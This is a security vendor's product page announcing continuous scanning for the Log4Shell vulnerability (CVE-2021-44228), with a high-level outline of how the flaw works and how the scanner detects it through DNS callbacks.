Continuous monitoring for Log4j vulnerabilities

Detectify now checks for the critical and actively exploited Apache Log4j vulnerability CVE-2021-44228, a.k.a. Log4shell. Customers can start scanning their assets straight away. New to Detectify? Start a trial today and get unlimited scanning for 2-weeks.

Log4j illustration

How has the Log4j threat impacted software?

The CVE-2021-44228 Apache log4j RCE vulnerability allows an attacker, who can control log messages or log message parameters, to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Some of the software identified as potentially vulnerable includes solr, druid, flink, struts2, logstash, redis, elasticsearch, kafka, pulsesecure, spark, and tomcat.

Read more in our blog post.

Crowdsourcing security is a must

Thanks to our ethical hacking community, Crowdsource, we’ve received a variety of proof-of-concepts with valid payloads for CVE-2021-44228 Apache log4j RCE, and Detectify customers continue to benefit from the growing testbed for better coverage over this critical vulnerability.

How extensively does Detectify check for Log4j vulnerabilities?

Detectify Surface Monitoring sends payloads to request headers and URLs (in some cases, query parameters too). We currently send over 20 malformed requests for the Log4j vulnerability in our customers’ assets (including GET request parameters in some tests). When we send a payload and observe something trying to resolve on a domain, we produce a vulnerability finding.

Examples of technologies we scan for:

  • VM vCenter
  • Apache Struts
  • VMware Horizon
  • Apache Solr

In Application Scanning, customers have access to all of the above and more. Detectify scanning engines crawl customer applications followed by extensive fuzzing of all parameters, such as cookies, JSON keys, and query parameters. We also send payloads in certain events, such as an error. If we receive a DNS ping back, a vulnerability finding is triggered.

Please note: due to the evolving nature of the situation, we may change how we scan for Log4j.